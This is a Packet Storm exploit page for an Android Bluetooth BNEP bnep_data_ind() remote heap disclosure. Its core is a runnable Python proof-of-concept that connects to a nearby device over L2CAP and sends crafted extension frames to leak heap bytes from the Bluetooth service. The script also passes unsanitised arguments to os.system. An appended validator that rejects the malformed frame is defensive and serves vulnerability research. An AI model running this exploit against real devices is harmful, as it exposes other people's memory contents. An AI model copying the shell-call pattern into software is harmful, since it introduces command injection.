Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

πŸ—“οΈΒ 23 Mar 2018Β 00:00:00Reported byΒ QuarksLabTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 62Β Views

Android Bluetooth BNEP bnep_data_ind Remote Heap Disclosure in hciconfi

Related

| Reporter | Title | Published | Views | Family |
| --- | --- | --- | --- | --- |
| 0day.today | Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploit | 23 Mar 2018 00:00 | – | zdt |
| 0day.today | Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Exploit | 23 Mar 2018 00:00 | – | zdt |
| Packet Storm | Android Bluetooth BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-Of-Bounds Read | 23 Mar 2018 00:00 | – | packetstorm |
| NVD | CVE-2017-13261 | 4 Apr 2018 17:29 | – | nvd |
| NVD | CVE-2017-13262 | 4 Apr 2018 17:29 | – | nvd |
| NVD | CVE-2017-13260 | 4 Apr 2018 17:29 | – | nvd |
| NVD | CVE-2017-13258 | 4 Apr 2018 17:29 | – | nvd |
| Prion | Out-of-bounds | 4 Apr 2018 17:29 | – | prion |
| Prion | Out-of-bounds | 4 Apr 2018 17:29 | – | prion |
| Prion | Out-of-bounds | 4 Apr 2018 17:29 | – | prion |

```python
import os
import sys
import struct

import bluetooth

BNEP_PSM = 15
BNEP_FRAME_COMPRESSED_ETHERNET = 0x02
LEAK_ATTEMPTS = 20

def leak(src_bdaddr, dst):

    bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bnep.settimeout(5)
    bnep.bind((src_bdaddr, 0))
    print 'Connecting to BNEP...'
    bnep.connect((dst, BNEP_PSM))
    bnep.settimeout(1)
    print 'Leaking bytes from the heap of com.android.bluetooth...'

    for i in range(LEAK_ATTEMPTS):
        # A byte from the heap at (p + controlled_length) will be leaked
        # if it's greater than BNEP_FILTER_MULTI_ADDR_RESPONSE_MSG (0x06).
        # This BNEP packet can be seen in Wireshark with the following info:
        # "Compressed Ethernet+E - Type: unknown[Malformed packet]".
        # The response sent by bnep_send_command_not_understood() contains 3 bytes:
        # 0x01 (BNEP_FRAME_CONTROL) + 0x00 (BNEP_CONTROL_COMMAND_NOT_UNDERSTOOD) + leaked byte

        # 0x82 & 0x80 == 0x80 -> Extension flag = True. 0x82 & 0x7f == 0x2 -> type
        type_and_ext_present = BNEP_FRAME_COMPRESSED_ETHERNET | 0x80

        # 0x80 -> ext -> we need to pass this check: !(ext & 0x7f)
        ext = 0x80

        # i -> length (the 'p' pointer is advanced by this length)

        bnep.send(struct.pack('<BBB', type_and_ext_present, ext, i))
        try:
            data = bnep.recv(3)
        except bluetooth.btcommon.BluetoothError:
            data = ''

        if data:
            print 'heap[p + 0x%02x] = 0x%02x' % (i, ord(data[-1]))
        else:
            print 'heap[p + 0x%02x] <= 6' % (i)

    print 'Closing connection.'
    bnep.close()


def main(src_bdaddr, dst):
    os.system('hciconfig %s sspmode 0' % (src_bdaddr,))
    os.system('hcitool dc %s' % (dst,))

    leak(src_bdaddr, dst)


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python bnep01.py <src-bdaddr> <dst-bdaddr>')
    else:
        if os.getuid():
            print 'Error: This script must be run as root.'
        else:
            main(sys.argv[1], sys.argv[2])
```
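A receiver-side check for the frame shape described in the comments above, as an added example (Python 3) that is not part of the original advisory or of Android's Bluetooth stack: it walks BNEP extension headers and refuses any declared length that leaves the received frame, which is the bounds check the PoC relies on being absent. Header sizes are assumed from the BNEP specification; the function names and both sample frames are constructed for illustration, and `walk_extensions(frame, 1)` reads the bytes the way the PoC's comments label them (ext, then length, directly after the type byte).

```python
# Added example (Python 3). Header sizes assumed from the BNEP specification.
HEADER_LEN = {  # bytes that follow the type octet, per BNEP data packet type
    0x00: 14,   # General Ethernet: dst(6) + src(6) + protocol(2)
    0x02: 2,    # Compressed Ethernet: protocol(2)
    0x03: 8,    # Compressed Ethernet, source only: src(6) + protocol(2)
    0x04: 8,    # Compressed Ethernet, destination only: dst(6) + protocol(2)
}
BNEP_FRAME_CONTROL = 0x01


def walk_extensions(frame, offset):
    """Walk chained extension headers from offset; return a reason or None."""
    while True:
        # Header is: type with 0x80 "more follows" flag (1 byte), length (1 byte).
        if offset + 2 > len(frame):
            return 'no room for extension header at offset %d' % offset
        ext, length = frame[offset], frame[offset + 1]
        offset += 2
        # The declared length must stay inside the received frame.
        if offset + length > len(frame):
            return 'extension length %d runs past end of frame' % length
        offset += length
        if not ext & 0x80:
            return None


def validate_bnep_frame(frame):
    """Return None when all headers fit in the frame, else a reason string."""
    if not frame:
        return 'empty frame'
    pkt_type = frame[0] & 0x7F
    if pkt_type == BNEP_FRAME_CONTROL:
        return 'control frame: not checked here'
    if pkt_type not in HEADER_LEN:
        return 'unknown packet type 0x%02x' % pkt_type
    offset = 1 + HEADER_LEN[pkt_type]
    if offset > len(frame):
        return 'truncated packet header'
    if frame[0] & 0x80:  # extension flag
        return walk_extensions(frame, offset)
    return None


# Constructed samples: the 3-byte shape the PoC sends, and a well-formed frame.
POC_SHAPED = bytes([0x82, 0x80, 0x05])
WELL_FORMED = bytes([0x82, 0x08, 0x00, 0x00, 0x02, 0xAA, 0xBB]) + b'payload'

if __name__ == '__main__':
    for name, frame in (('poc-shaped', POC_SHAPED), ('well-formed', WELL_FORMED)):
        print(name, '->', validate_bnep_frame(frame))
```

Either reading of the 3-byte frame fails validation, which matches the "Malformed packet" label the comments report from Wireshark.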
